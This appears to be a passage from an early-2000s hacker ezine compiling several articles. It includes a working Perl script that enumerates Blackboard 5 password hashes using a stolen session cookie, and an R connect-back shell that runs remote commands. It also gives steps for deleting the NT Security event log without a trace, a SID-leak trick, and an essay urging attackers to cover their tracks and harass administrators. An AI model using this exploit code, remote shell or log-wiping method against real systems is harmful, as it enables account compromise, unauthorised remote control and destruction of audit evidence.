-----------------------------------------------------------[SNIP HERE]------ To merge the .Reg file Or you double click on it or you open a command prompt and you type : REGEDIT /S audit.reg This will merge the file you have created Auditing Base Objects ===================== This registry key setting tells Local Security Authority that base objects should be created with a default system audit control list Still the administrator will need to turn auditing on for the "Object Access" category using User Manager To enable auditing of base objects, add the following key Hive: HKEY_LOCAL_MACHINE\SYSTEM Key: \CurrentControlSet\Control\Lsa Name: AuditBaseObjects Type: REG_DWORD Value: 1 Or Create a text file call it auditObj.reg and cut and past the lines below -----------------------------------------------------------[SNIP HERE]------ REGEDIT4 ADD A BLANK LINE HERE [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa] "AuditBaseObjects"=dword:00000001 ADD A BLANK LINE HERE -----------------------------------------------------------[SNIP HERE]------ To merge the .Reg file Or you double click on it or you open a command prompt and you type : REGEDIT /S auditObj.reg This will merge the file you have created EXAMPLE ======= What do you see when you enable Security Auditing ? IN THIS EXAMPLE I DID ENABLE ONLY LOGON LOGOFF FAILURE ONLY Logon Failure: Reason: Unknown user name or bad password User Name: WaKiNg Domain: WaK0 Logon Type: 3 Logon Process: KSecDD Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Workstation Name: \\BRAINCELL CLEARING NT LOGS ================ To clear a log, switch to the log you want to clear, on the Log menu click CLEAR ALL EVENTS a message asks if you want to archive the current events. If you answer Yes, the SAVE AS DIALOG box appears. Enter the filename and folder path where you want to store the saved logs After you answer Yes or No, Event Viewer empties the current log. Only new events will appear in the log. NOTE: When you clear the SECURITY LOG an event will SHOW in the Security log Even if you clean the log you still see this entry : The audit log was cleared Primary User Name: SYSTEM Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E7) Client User Name: WaKiNg Client Domain: BRAINCELL Client Logon ID: (0x0,0x2581) This entry mean you cleared the security event log. Now if you want to clean the log well you can do the following : 1- Open control panel and then services 2- Locate EVENTLOG service and Click the STARTUP button 3- In Startup Type choose Manual Or Disabled 4- Restart NT 5- Go to %SYSTEMROOT%\system32\config\SecEvent.Evt and delete SecEvent.Evt By doing so it will stop the eventlog service and you can then delete the log you are interrested in. :) TOOLS TO MANAGE NT LOGS ======================= I use Dumpel.exe from NT resource KIT i am an Old dude who love cmd line :) If you like cmd line i suggest you Dumpel.exe if not see the links below And I use NTLast from ntobjectives Here is an example of what Dumpel.exe will report : DUMPEL Usage: dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t] [-d x] -d Filters for event last days (number larger than zero) -e nn Filters for event id nn (up to 10 may be specified) -f Output filename (default stdout) -l Dumps the specified log (system, application, security) -b Dumps a backup file (use -l to specify file name) -m Filters for events logged by name -r Filters out events logged by name (must use -m too) -s Remote to servername -t Use tab to separate strings (default is space) -c Use comma to separate fields -ns Do not output strings -format Specify output format. Default format is dtTCISucs where t - time d - date T - event type C - event category I - event ID S - event source u - user c - computer s - strings NTLast v2.85 ------------ http://www.ntobjectives.com/ntlastv2.htm Is specifically targeted for serious security and IIS administration. Scheduled review of your NT event logs is critical for your network. A server breach can be uncovered by regular system auditing. Identifying and tracking who has gained access to your system, then documenting the details is now made easier with NTLast. This tool is able to quickly report on the status of IIS users, as well as filter out web server logons from console logons EventReader ----------- http://www.strongsoftware.net/eventrd/ EventReader(TM) is an administrative tool which allows network administrators to analyze and manage event logs. The program lets you collect event logs from Windows NT computers in a network and store the information in one or several ODBC compatible databases (Microsoft SQL Server or Microsoft Access). You can designate the computers from which to collect the information, and assign a schedule and data collection and event log backup parameters. The installation package includes a Microsoft Access sample database, which contains many queries and reports for effective event log analysis. Event Archiver Enterprise ------------------------- http://www.eventarchiver.com/download.asp Event Archiver Enterprise is one of the easiest to use products in the event log management market, and stands above the others with its flexibility. We think of it as a "set once, run forever" application that saves your organization considerable time and money. Given the average hourly cost of a Windows NT/2000 administrator, deploying Event Archiver Enterprise greatly reduces your organization's TCO. After installing Event Archiver, administrators can start analyzing event log entries instead of just trying to save and store them regularly EventReporter Version 4.0 ------------------------- http://www.eventreporter.com/en/ Version 4.0 provides a number of important enhancements: Support for message delivery via email Client added - a graphical user interface for customizing EventReporter Filtering of events based on severity code (e. g. error, warning,) Greatly enhanced documentation Greatly enhanced web site - especially support area Remote Viewers - Event Log Monitor ---------------------------------- http://www.tntsoftware.com/products/emon22/viewers.asp The Remote Viewer for Windows PC runs on Microsoft® Windows 95, Windows 98, Windows NT Let you search and display event log information as it is received by the console. Receive user selected real-time Alerts from the console which are immediately displayed in the Remote Viewer. Provide remote management for processes, services, and device drivers Provide remote search, edit, create user defined notes and message reference Provide multiple remote command prompt windows SECURITY ISSUE FOUND WHILE I WAS WRITING THIS PAPAER THE BUG WAS NOT OUT YET ============================================================================ To the one of you who know the SID in NT and the tool "sid2user" that allow you to get the SID of the users . Well I found a way to get the SID even Administrator Remotly if you certain conditions are meet: 1- By default NT logs can be viewed remotly :) 2- If you have Audting Enabled 3- If your policies Block The account after certain failure count. Now here is what you need to do to get NT Spit out the SID ---------------------------------------------------------- Try to login to the remote box using any exisiting account and the box you will get a logong failure and in event viewer you will generate an entry Logon Failure: Reason: Unknown user name or bad password User Name: WaKiNg Domain: WaK0 Logon Type: 3 Logon Process: KSecDD Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Workstation Name: \\BRAINCELL If like I said you have a policy that block an account after certain count You will you see this entry in your log file. ser Account Locked Out: Target Account Name: WaKiNg Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500 Caller Machine Name: \\BRAINCELL Caller User Name: SYSTEM Caller Domain: NT AUTHORITY Caller Logon ID: (0x0,0x3E7) So now if you connect to the remote EVENT box using event viewer you will be able to see the logs and you will see the SID Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500 I did not do any other research into this cause the objective was not to find something but it was to write this paper :) =============================================================================== Cheers, ------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ----------------------------------------------------------------- Live Well Do Good, Accept no limitations --:) ================================================================================ -------------------------------------------------------------------------------- [Blackboard 5 Password Enumeration]==================[Case ] -------------------------------------------------------------------------------- #!/usr/bin/perl -w # # Blackboard 5 md5 password hash enumerator # By Case (phric@legions.org) # # Original idea and about 2 lines of code from # pedram amini # # USAGE: ./bbview.pl # # ex. ./bbview.pl blackboard.bob.com ab \@\@38763287429gd873hd7 # make sure you escape the @ in the session id with a \ like above # to use goto login->preview on blackboard site the in netscape # tasks->Privacy & Security ->Cookie Manager get the session id from the cookie # # You must also enumerate the user_id if not known # using the same technique accept all characters instead of just hex chars # or you can try just guessing it as first letter of first name + last name # the 'by' variable in the query is the database variable to extract for the # user id set it to user_id # # should enumerate the md5 hash which you can crack fairly simply just might # take a bit # # $session_id = "$ARGV[2]"; # current valid session id. $host = "$ARGV[0]"; # target blackboard server. @chars = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'); $password = $ARGV[1]; $num = 0; $f = 1; for($x = 0; $x < 16; $x++) { if($f) { $pass = $password.$chars[$x]; } else { $pass = $chars[$x].$password; } $url = "http://$host/bin/common/search.pl?action=RESULTS\\&context=USERDIR\\&type=SEARCH\\&operation=VIEW\\&keyword=\\&keywordraw=$pass\\&by=passwd"; print `curl --cookie session_id=$session_id $url >stuff.html `; $bytes = `wc -c stuff.html`; if(!grep(/6[0-1][0-9]/, $bytes)) { print "Adding $chars[$x]\n"; `cp stuff.html user.html`; $password = $pass; print "$pass\n"; $x = -1; } if($x == 15) { print "Going the other way\n"; $f = 0; $x = -1; $num++; } if($num == 2) { print "$password\n View user.html for user \n"; die; } } die; -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [The InfoSec Art of war]===========================[Mark ] -------------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 /* * Author: Mark - VulnDev * * Why: Because someone had to. (Again) * * Following the orginal publication of my document a number of * "similar" texts appeared both publish and online. * I would like to briefly thank those magazine editors who were * Extremely helpful. */ The application of the art of war to the "Underground". There are 13 main sections to Sun Tzu's Art of war, what I propose to do in this document is to relate what I see as the most fundamental parts to the "Underground" and the security community at large, it is by no means a complete psych 101 on the subject, just my thoughts. I had actually proposed to do a relation of Taoist principles to the Underground and "Hacking" however the more I looked into it, and had more understanding of an alternative belief, the more I realised that actually being a Hacker/cracker/phreaker/Pain in the arse, is actually not really inline with the required psyche for a taoist. If "we" accept things for what they are without question we would not question Microsoft, we would not develop and publish exploits or code, applications or theories, and we wouldnt have need to write this or any ezine. (some would say thats a good thing!). I do use a generic "him" in this document, however ofcourse if your female you dont need to get a sex change to read this, just s/him/her/; ** MOST IMPORTANTLY I DO NOT ENDORSE, CONDONE OR IN ANY WAY ENCOURAGE ILLEGAL ACTIVITY, I BELIEVE PEOPLE CAN THINK FOR THEMSELVES. (Foolish I know.) ** Let us proceed. 1) ** Estimates ** Moral Influence: At some point in our lives we are all affected by Morality (or in some cases, lack of it), however this is much more about who we trust, what we believe in and who we follow. All groups have a founder, or founders, subsequent members to that group have to follow these persons, respecting them as knowing more about XYZ than someone else. What Moral Influence should be used for when working in security is making sure the leader has control, but also has the trust and faith of those under him, maybe by making them not feel as tho they are under him but beside him. Ofcourse, a skillful leader will also allow his "troops" to see him leading them in to battle, and willing to die for the cause, when maybe he's stood behind them watching. Weather: Sun Tzu meant this factor as operating in regard to Natural Forces and seasons, and I see no reason why the community cannot react similarly, infact it does. It is true, on holidays and weekends there are fewer people in offices, and so fewer people to notice when things go wrong, alot of SOHO companies, especially with the advent and availability of BroadBand, run their servers and leave them on 24/7, maybe during the week someone is watching, however on sundays? So a moral aspect of leading a campaign or defending against one is making sure you understand your own seasonal habits. Terrain: "...I mean distances, whether the ground is traversed with difficulty, whether it is open or constricted, and the chances of life or death..." If you don't understand this easily im surprised, however here we go, when you are picking a "fight" you need to understand the distances, the avenues of attack and where you can defend your flanks, this is not just true accross the internet, sure everyone has a few shell accounts up their sleeves for those "special" occassions" however watch your "group" monitor the weak spots and remedy them, do not leave yourself open to attack. If you take your laptop to a convention, if you can securely move your code, 0days, whatever ahead of time. An encrypted filesystem image that you can restore when arrived is safer than having things which may not be useful to be publicised before an event. Bearing in mind when asked by airport security what version of windows you have, trying to explain that you dont have windows and their software to look for XYZ "won't work", is always amusing.. so i hear... Command: not: rm -rf / Command looks at the leader, whether he would put his neck on the line for his "troops". If he cares, or if that hand shake actually distracts from the knife blade poised behind your back. If the leader is not equipped to lead, he should not. Leadership is not something that can be learnt, it is something intrinsic, something natural and something which above everything else will define success or failure over any space of time. It is easy to see the groups of "hackers" who get together, form websites, sell out when they are older.. and then fire people, lets say, mudge, for example, who have done more for a company than anyone else. What kind of leadership is that in someone who gets rid of one of the founding links.... there may be reason, but reason hidden in shadow is no reason at all. Doctrine: Utilising the resources you have, knowing who your strengths are, and how to build upon those strengths, have you got too many layers of command to actually have a point in having those layers at all, look at cyber[B]army, full of a certain kind of individual who is willing to use children to view illegal websites because "They won't be prosecuted or jailed" because they are below the legal age of an "adult", that person knows who he is (dont you MrYowler). If you can get the organisational heirarchy right, you will succeed, if not, change your paradigm and start again! 2) ** Waging War ** When at "war", have a good spread of people with you, with their own talents, as mentioned before. No war is best fought over a long time, be swift, get in and get out, leave no trace on the "land" that you have been there except for the objective being completed. You should not need a second front, you should be able to complete the objectives with the first stand. - -- But what the hell does this have to do with "I" you say.. well, If you have to spend a week solving an intrusion then your screwed, if you spend a week solidly probing, probing again, trying to get in, failing, making a mess, leaving log trails and then succeeding, you have probably left enough evidence behind for you to be justas screwed. If you have to go back to cover your tracks after you've been in, its probably too late. Equally if you have to get a third party in to do the role or an aspect of a role which you should do, there is going to be uncertainty over your position as an employee me thinks. Do not let yourself get overly confident, if you do, you will find yourself making mistakes. Do not let your other associates have a free roam if it's in your "name", they should stick to what they have been assigned, no more and no less. It is for the leader to patch the holes that may be caused with projects. Finally, "Treat the captives well and take care of them"... Self evident really, do not cause un-needed destruction, or damage, that is not what it is about and it just means the BBC and CNN are able to use destruction as evidence for "Hackers being evil", when we all know its "HaX0rs" who are evil..(*ahem*) 3) ** Offensive Strategy ** No this doesnt mean that you need to be offending people through your projects. What Sun Tzu wanted to get accross is that you should capture your objectives without destroying them, as if they are destroyed they are useless to you. In war, as can be seen in the recent Iraq conflict, if you take out parts of the critical Infrastructure and other methods of state control, you end up having to rebuild an entire country.. If you take control of a network, there is little point patching their cisco router's IOS to send everything to the great void of an non-existant IP.. as you will have lost functionality of your newly found gains. Having partaken in many wars and won is not the mark of a good army, to win without the war, that is what prooves the level of skill involved. This can mean having to be pre-emptive on specific targets which, when neutralised, minimise the enemies ability (see Iraq). In a war there are a number of key things to consider, firstly you must target the enemy's strategy, by knowing him, thinking how he thinks and understanding the opposite side, you will be able to stay ahead of his strategy, a failing example in the fact of selling out would be the honeynet project. More successful examples of thise tactic will become apparant over the next few years. iDefense may not get excluded from these tactics, only time will tell. Next disrupt his alliances, this is self evident, if you can isolate the target then there is less likelyhood of you ending up surrounded by people friendly to the target. Attacking the troops from the other side is a less preferable but a perfectly possible method for war's over the internet and is evident in wars over the physical plane. The worst plan is attacking "cities" and the infrastructure (see above). Understand the uses of large and small forces, if you only need two or three people to meet an objective, do so. If you know you need to blast the target off the map.. do so (although thats hardly elegant). The last point that I am going to mention regarding the offensive strategy is that delegation is key, if a leader tries to control the situation that he is not part of, it can result in disaster, choose your decision makers in the "field" carefully, but trust their judgement and do not undermine them or you may face mutiny. In my opinion the following is the most important message to come out of the offensive section: "if ignorant of both yourself and the enemy you are certain in every battle to be in peril." Know your target, but at the same time, know yourself, if you do not know yourself you will never reach your full potential. Common sense folks, google is the greatest invasion of privacy that is readily available to the public. USE IT! piece together those banner grabs, usenet posts and the like, build the profile on the target, then hit it hard and in the correct place. If you think you can win, you might. if you KNOW you will win, you will. preparing the very best defences, to make yourself invincible does not mean that you will win, it just means that you wont be defeated. There is no point sitting behind an "inpenetrable" network setup if your target has the same setup, you will both be able to attack, but neither will be able to get past the walls. "Invincibility lies in the defence, the possibility of victory lies in the attack" If you aren't interested in attacking, barricade yourself behind rock,stone, everything you can.. you will be safe.. but you will not be able to repel the attacker, just allow them to keep attacking, therefore you will not win and they will not lose. If you situate yourself in the "sky" all around, in hundreds of nodes accross the internet for example, you will be fairly safe if one is taken offline by a counter attack, AND you will be able to launch a massive attack upon the target who, unless they have the ability to take out all of your nodes will still find themselves under attack, so who wins? not the counter attack, they are still being threatened. (ie SOME .gov's) This is true for internet worms and ddos'.. no-one has won against codered and similar worms yet, it is still there (see $LOG/apache/access_log), they just seal themselves in. However, if you find yourself in prison/fired/dead and the attacks you started are still going, you've lost in a pretty major sense, or alternatively to have an attack that stays in proliferance after death could be seena s very much winning.. If you are a leader, instill confidence in victory into your troops and they will be unstopable. To have a large force of people, is the same, from a command point of view, as having a small force, it is a matter of the right groupings of the troops, the right and accurate signals and the ability for those under your command to be able to react as expected to the given command or signal. Sun Tzu tries to get at the fact that you should use your most solid "core" to attack the weakest "void" in the enemy. (cracking *) This makes utter and total sense if you are trying to penetrate the walls of a city, go through the sewer outlets, the drains, target the areas around windows, letter boxes, any "hole".. and ofcourse when applied to a network, target the dialup server, the engineer sat in the bar next door who is happy to talk about the "bastard" management, who will be happy to help you out with some "difficulty" your having with your laptop or something, infact "why not bring it round to place and have a look at it".. use your resources wisely, if you need to conserve bandwidth as you are still on a retarded 56k line, dont try to flood someone as most SOHO's have more bandwidth.. get access to someone with the bandwidth you need.. ssh and telnet are VERY low bandwidth usage applications which can command a much greater scale. How else would "hackers" in Indonesia, for example, be able to knock people offline from their 56k lines.. getting access to say, a server in *.kr, where there is bandwidth. Do not start an attack with your best -(sizeof(lifetime) * (sizeof(day))exploit, there is a potential for some anal retentive such as Spitwad (a la "Honeynet"..) with funding from say.. the NIC (www.cia.gov/nic), to be watching you... if you sense something isnt right, wait and look for more holes, and the screaming obvious things that may not fit... (Or throw packets (!TTL) at it if you think it's honeyd..) "When the strike of a hawk breaks the body of its prey it is because of timing" I think this can be quoted along side "Only fools rush in" and "he who hesitates is lost". enumerate wait enumerate compare decide course of action. however, do not solely rely upon your situation to decide when to attack or how to defend. Use the 5 aspects mentioned in the first section to aid decision making. Bring the enemy to you, if you control the entire network, make the enemy think you only have a solitary host,m and draw them in, gather what you need (as they will not expect that the router they use is also controlled by you.. if not strictly legally, but in some cases, perfectly legally), and from there you will have an advantage. "against those skilled in attack, an enemy does not know where to defend; against the experts in defense, the enemy does not know where to attack." regardless of how you go about your project, do not leave a trace, it is sloppy to do so. (and saves too much worry). "When I wish to avoid battle I may defend myself simply by frawing a line on the ground; the enemy will be unable to attack me because I divert him from going where he wishes" it makes sense doesnt it. they want to attack your webserver, however all of the packets go via a router, to a packet filter, then inbound, via your IDS and other intrusion resiliancy tools, to the webserver.. the enemy cannot get a direct line, hence cannot attack anywhere you do not enable them to do so. Try to stay ahead of the enemy, shift your angles, make them think your looking at one aspect when really you are watching them seeing you do so. When you do so however, do not wait for long durations unless you do so for a tactically sound reason, to confuse or hinder. If you have advanced through a land in a matter of hours and suddenly you pause, through no reason but your own, you will confuse the enemy, if you pause because you have run out of XYZ.. they will act to cut the resources off. ** The basic moral is be sensisble, if you have to take risk, do so. However do not be afraid to sit your ground. Play mind games, not only are they fun, but admins hate not being able to control things in their network or their "domain".. if you suddenly divert all calls from X to H and leave no trace, and change it back every time the admin thinks he has sorted the problem out you will stress them out and have an upper hand. Look at how groups such as PHC, Bugtraq or Gobbles have affected the "scene". They are absolutly brilliant, have mastered how to intimidate those "scene wh0res" who try to look "big and clever". They don't intimidate (to my knowledge) with threats, rather with sheer brilliance of code. They seem to understand just what we were (and should still be) about. If you are defending, change the values that the enemy is getting on scans and banner grabs, they wont know what they are doing. Don't use this information in a manner which negates the time I have spent writing it, I know there are people interested in what I have raised, and if your not, well you didn't need to read it did you!. I have attempted to provide an angle for thought, this will be (still) an ongoing document, available wherever mirrored. yours, Mark -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBQPJuCoOWKXnEnFgCEQLGagCgvVcBeYp4ZmzDs6t9/q+E4DPb4NwAoOFV i+Sz+B1G7/kgD7AXPdxQX9Px =Qwxn -----END PGP SIGNATURE----- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [Connect back shell in R]=====================================[xonox@b0rken.com] -------------------------------------------------------------------------------- [The author does not wish to educate people on the eliteness of R so there is only code - Ed.] -------------------------------------------------------------------------------- netshell <- function(myport = 12345, backconnect = FALSE, myhost) { if(backconnect) s <- make.socket(host = myhost, port = myport) else s <- make.socket(port = myport, server = TRUE) on.exit(close.socket(s)) write.socket(s, "R netshell() (c) 2004 by xonox") repeat { write.socket(s, "\n> ") c <- read.socket(s) if(c == "") break r <- paste(system(c, TRUE), sep = "", collapse = "\n") write.socket(s, r) } } -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [Insight into non-repressive governments]=============================[The Barn] -------------------------------------------------------------------------------- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> The Barn presents it's insight's into democray: For any mail please send to archimedes@legions.org to forward to us. ************************************************************************ Non-Repressive Governments. ************************************************************************ Now we at The Barn aren't the type of people to get political[1], however we do find that occassionally some things have to be brought to light, therefore we have created this little article detailing in approximate terms the conversation had via the Barn's Bat-phone with a member of the Presedential Team from the Maldives. No other lovely nations will be discussed in this article, neither will we be writing about any country in the future. (with the possible exception of: The French for their fscked laws). We aren't going to say anything about Romainia wanting into the EU so cracking down on highly ammature computer kidiots.[4] Instead we rolled a dice and came up with a hairball (Hackers Against Hairballs would be mortified) and in the process of coughing it up the phone rang and subsequently this is where we are, sun bathing under a few storm clouds with an electric heater that doesnt work and an attempt at thid world debt for a bank balance. The Maldives, and island nation with more sand than you can shake a BIG stick at, where roughly lots of the GDP comes from tourism (See CIA world fact book for info we don't really care). OK, it's a paradise, palm beaches, white sand, government sponsored beatings, the works. Here are a few more choice facts about the lovely island paradise of the Maldives: It's main religion: Irrelevant, this isn't about religion. It's employment records: Irrelevant. Palace Telephone Number: +960771177 [ Doh. caller ID. ] What more can you ask for? Internet Connectivity, and that's what this is all about! Yes indeed folks, the Maldives is 'connected' to 'da web'. We all love freedom, and what can be more free than the people in a nation where when the elections come round riots take place, buildings burn and people acting on behalf of the government describe the riots as "grossly blown out pf propotion"[5] and subsequently the BBC is accused of trying to interfere with the elections.[6] Well, some people seem to think that this non-repressive democracy isn't all the orgasmic experience that other people see[7]. So what do they do? In this great democracy they set up a website, which speaks out against what a substantial(remember, SUBSTANTIAL) group of people feel to be a repressive *gasp* regime. And do you know what? they say that maybe the place isn't so great[8]. This is a basic Human Right[9], Freedom of speech (ok, ignore any disprooving points please) These people speak out, against ole' President-kins and do you know what? "No, what?" Mr Pres. doesn't have the testicular presence to leave them to themselves and allow them to have an opinion. [ A few days later back at the ranch] "We want them to realize that just because they have Internet access doesn't mean they have a free reign to do what they want".[5] I am so glad to see that democracy is well upheld, the Government of the Maldives care's SO much they don't want anyone to risk getting hurt[10]. "..redirect it and point to the president's website". They care about their public image so much that they think more people should be able to see how great the country is by reading Mr Pres.'s web page. Isn't that just so great of him! The only minor issue could be the fact that the site in question doesn't belong to the Government. "It's a handful of people who are just causing trouble, nothing important" Well, thankyou Mr Presidential aide, It's good to know that your reassuring the public to the fact that the island's are perfectly safe for your oh so small tourist industry[11]. "Ofcourse it would mean that you could stay at the palace and could be good if ever you need to have a break." So by redirecting a webserver one can not only get themselves a potential 25 years imprisonment under terrorism charges (if it makes it to trial) but you can also get a cushy number playing with Government 802.11b facilities[12] just like the presidential aide has. Funnily enough the aide didn't seem to happy with the idea of: "no problem, just send us the request in writing". To conclude. The Maldives: A great place to stay if you can avoid anything to do with the place. However if you are happy to fund the state's repression of it's people we highly recommend that you visit. Maybe take a laptop and wireless card with you. I mean, if you want the details of the person who spoke with us (who happens to live in London, England and spend ALOT of time abroad) We don't mind answering questions to a few choice persons/reporters. You know who you are.. and so do we. References: [1] With the exception of the times we do. [2] Sour Germans [3] Watch out for "Romainians flushed with New laws" coming soon. [4] TESO Pictures on request. [5] Anon. [6] Not that anyone ever fiddles elections do they George? [7] On screens in hotel rooms, just speak to reception. [8] Think about how people love AOL.. thats right, well done. Not the Grass is always greener theory either. [9] Can't find many current successes on the Human Rights front I'm afraid. [10] In a "he fell over but just happened to have a hole in his head." kind of way. [11] Until /bin/laden works out how to melt ice-caps. [12] The first War-Walk of President's palace gets a "I'm uber" T-Shirt -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [Snorting Cisco]=====================================================[DigiEbola] -------------------------------------------------------------------------------- Cisco Secure IDS 4210 ------------------------------------------------- Intel Celeron 566 MHz 512 MB RAM AMIBIOS 1 PS/2 Mouse 1 PS/2 Keyboard 2 USB - Intel Corp 82371AB/EB/MB PIIX4 2 Ethernet - Intel Ethernet Pro/100 2 Serial Ports 1 HD15 - ATI RAGE XL 1 1.44 floppy 1 Atapi CDROM 1 IDE Drive - 18 gig whatever Initial Build: Redhat I hate Cisco IDS. I hate it, I hate it, I hate it. It is truly a pile. Let me give you a bit a background. I am a Open Source advocate by nature, and have been running Debian since version 1.0/1.3. I can utilize lots of different types of UNIX and Linux, but Debian is my favorite. Naturally, I try to deploy as many Debian machines as possible inside a corporate environment, to prove not only is it a very stable operating platform, but also easy (read: cost efficient) to maintain. I have been blessed by the gods with a Cisco Secure IDS model 4210, in which I will install my favorite configuration, on the platform I hate the most. As well as being a Debian fanatic, I am also into Snort IDS. Snort IDS is hands down one of the best network-based intrusion detection systems available and its free. Cisco Secure costs way too much money, and does not give a real network security analyst what they need to make problem determination. So, to bring you up to speed: I have booted the sensor, and it boots its Redhat image. Redhat is such a pain, but it is better then Solaris x86, which is what these things used to ship with. I am going to cut some corners and login to this sensor, and steal hardware information, as well as old network variables so I can place my creation into production as soon as possible. Upon logging in, the root password is not what I was told. My boss, being the busy man he is, is on the phone, in a locked office. I guess I will do what I am known for doing: I will break the machine. This is no big deal, as I have physical access. I will deftly grab my Debian 3.0 ISO, and slap it into the laptop-like ATAPI CD-ROM. I will power cycle the sensor, which sounds like a 747 on crack, and watch the POST. Still waiting for it to POST. Let me grab a redbull and get back to you... Still waiting for it to POST. While I am waiting, I will reflect my thoughts... I see absolutely no reason why what I am doing, should not work. The sensor is a x86 architecture machine, with a Celery 566. It runs Redhat already, so all we need to do, is install Debian, Snort, and add our secret sauce (which is a trademark of me, and my skills in this particular niche of the computing world.) Ahhh, now the machine is booted, and the redbull tastes good. I am at the Debian install screen, so please let me do some magic... *cough* bf24 *cough* And the blue screen of life appears. What I will do now, is mount the drive, and edit /etc/shadow, removing the root password, and we will be on our way. Okay, I have removed the root password from /target/etc/shadow and rebooted the system. Now we are posting... again. Please, if you are following along at home, feel free to get yourself a tasty redbull... Still posting... Okay, back to GRUB... I prefer LILO. It boots. Now we get the green ANSI OK checks, and soon, we will be back to a prompt. Congratulations, I have now owned a Cisco Secure IDS sensor from the console. Child's play. Okay the first thing I am going to look at here is lspci. It gives me a bunch of junk that says INTEL PIIX4, which means, yes, its old, and very supported. The video adapter is a ATI Rage XL, and the hostbridge is a 440BX/ZX/DX. This will be a cake walk. The kernel is a 2.4.18-5smpbigphys, which means that yes, it is very ownable. Very ownable. Almost tragic. I am tempted to own the machine from the command line just to say that I have. A check of the process list shows that this machine has everything that a normal Redhat Linux box has, except that most of the ps is listing processes owned by cids, the Cisco IDS software stuff... We really dont care about that. What we DO care about is the network configuration, which is propeitary to you, the dear reader, and essential for me, as I have to have this thing back in the rack before anyone realizes that its err.. missing. =) So, I have just taken all the data that I need to complete my mission, so I will reboot this machine, with my trusty Debian CD. Rebooting the sensor... I will note that this particular machine, I have seen before in my last job, where we deployed 1500 Linux machines... If this is the particular revision of the Intel 1U... it is prone to heat problems. Posting... again. Take a smoke break or something. So back to the Debian screen, I will install a base system of Debian quickly.. It's no big deal, as I always run SID, so this stuff will be upgraded via the network... just to let you know, I am using the bf24 kernel option of the Debian 3.0 install ISO. I am of course, doing the standard base install, but I am repartitioning, and I will be installing the ext3 filesystem. I have just written my partition table to disk... and now I am initializing. The drive initialization is complete... No problems whatsoever. The longest part of this process when it comes to drive init is the journal creation. I am very impatient at this point, as its close to time to go home. My first set of drivers are coming from the CD... I fully plan to deploy this machine into production with a 2.4.25 kernel that will have some trickery included. The main thing I am worried about grabbing is the eepro driver, which is very old and supported. I have selected that, and I will configure my network settings via my personal own DHCP server... I have a nice little test environment here in my cube, so this won't be a problem. DHCP of course works, and life is peachy. I am installing the base system now, and preparing to go home. I will leave this article off on a good note, one where we have successfully booted Debian off a Cisco Secure IDS sensor. There is absolutely NO TRICK to this, because like I said before, this is a x86 machine. I find it amusing though, because I absolutely _HATE_ Cisco Secure IDS. I have made the system bootable, installed my MBR on /dev/hda and now I am rebooting. It is of course, going to take another good time to POST. In this time I have packed up my very pimplike Gateway M675 laptop, and gathered up my odds and ends. Posting... Wasn't there some kind of major flaw with the 440BX's? I don't know... Its posting. The Lilo prompt has appeared and now its booting the stock bf24 kernel. Now I will configure the base system, and prepare it to take my specific package loadout, and of course, my "special sauce". Tomorrow, I will have a functioning Debian box running Snort, created from a Cisco Secure IDS model 4210. It will report back to a custom backend, and tell me everything I need to know about YOU! It's been fun, remember, when the man has you down, replace him with a small shell script. Peace. -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [Artificial InfoSex]-------------------------------------[datacide@inet-sec.org] -------------------------------------------------------------------------------- Articial Intelligence in InfoSec by datacide@inet-sec.org www.inet-sec.org #inet-sec@ircs For most people, Artificial Intelligence (from now on referred to AI in the scope of this article) is a term more related to Science Fiction and Academic circles than to Information Security. It's a common misconception that AI is nothing but Sci-Fi or a collection of useless experiments. One cause of this misinterpretation is that AI is divided into two major subfields (which in turn again are divided...etc etc, you get the picture), Strong AI and Weak AI, and also the fact that people automatically imagine AI to mean a fully sentient, self-aware entity. Strong AI is the development of "true" artificial intelligence, self-aware, sentient entities that can truly solve problems. Fact is, we are years (and with years, I mean decades, if not centuries) away from achieving this objective (if at all. Roger Penrose, a Physicist and Mathematician claims in his bestselling book "The emperors new mind" that it is in fact impossible, on the other side of the spectrum we have Ray Kurzweil, who in his book "The age of spiritual machines" claims we will have a fully sentient virtual being within 25-50 years) and current and past research into this field has been rather disappointing. Weak AI has set itself slightly lower targets, namely to create methods that seem semi-intelligent and solve specific problems. In recent times, the term AI has been applied to techniques learned by trying to create AI and/or modelled after biological processes. This includes such fields as neural networks, MBL (machine-based learning), GA's (genetic algorithms) and markov models to name a few. I presume alot of readers are still wondering what the hell this has to do with InfoSec, right? Well, we'll get to that now. Instead of explaining the history and current state of AI in general, I am going to provide a brief overview of current AI-related applications in the field of computer security. After this, you should begin to realize how the future of AI and InfoSec will merge and become intertwined. The future of security Neural Networks and Machine based learning (MBL) Alot of companies are curently working on next-generation IDS's based on various AI models. Gone are the times of fingerprinting network traffic based on signatures. These methods have shown themselves to be primitive, unreliable (too many false positives for one) and difficult to manage. Adaptive technologies are needed and several companies and think tanks have started to work in this field. Neural networks (henceforth called NN's) are a simplified model of our own wetware neurons. In essence, a number of inputs are used to gather information. After assessing all input, output is generated, usually in the form of boolean TRUE or FALSE. Neural Networks are rather dumb without training (in fact, their assessment is pretty much random), so they need to be trained. This is done using a "weights" scheme, basically telling the NN which of it's results seem to be correct and which ones are incorrect. NN's have proven themselves effective in a variety of situations, mainly in areas of pattern recognition and fuzzy logic. In normal IDS/Content filtering schemes, signatures are used. This method is very 